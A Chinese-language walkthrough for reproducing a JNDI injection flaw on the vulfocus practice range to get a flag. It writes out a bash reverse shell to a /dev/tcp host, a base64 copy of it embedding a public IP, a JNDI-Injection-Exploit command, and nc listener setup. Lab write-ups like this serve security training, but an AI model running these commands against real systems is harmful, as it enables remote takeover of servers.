一:工具下载
百度网盘链接:百度网盘 请输入提取码8888
二:vps服务器(因为反弹shell时候需要用到公网)
我这里使用的是阿里云的轻量化服务器;(所谓的云服务器就是你去阿里云或腾讯云的平台购买一台云服务器)
这里对于小白来说有一个哔哩哔哩小视频可以供你们参考一下,里面包括购买vps服务器和finalshell终端
全网最快!6分钟教你从配置服务器到搭建网站!_哔哩哔哩_bilibili
三:复现过程
1:首先打开finalshell或其他本地服务器上传,先创建一个ddd文件夹,并把下载的工具转移到该目录
2:进入该目录下
3:执行以下代码:
注意:执行前要确保你的服务器安装了java环境:
sudo yum install java-1.8.0-openjdk-devel
bash -i >& /dev/tcp/(你服务器的公网IP地址)/8888(监听的端口号,我这里使用的是8888端口) 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzYuMjMxLjczLzg4ODggMD4mMQ==(这是上一行代码的base64编码)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzYuMjMxLjczLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" -A "(你服务器的公网IP地址)"
4:开放所有端口(1~65535)
5:打开另一个终端端口并开启监听8888端口(8888端口是你在前面设置的监听端口)
这里有几个点:若你还没有安装ncat可以通过执行以下命令完成
sudo yum update#更新你的yum数据包,确保是最新的版本
sudo yum install nc #安装nc
sudo yum install namp-ncat#安装nmap-ncat
5:到vulfocus靶场
6:用burpsuite抓包
发送到repeater,然后修改payload,最后按send提交
如果出现右边界面200+ok则是发送成功
本地服务器第一个端口会出现
第二个端口会出现
这样子就成功监听到端口,先进入tmp目录下,在输入ls可以爆出flag;
将flag复制粘贴到vulfocus靶场中即可。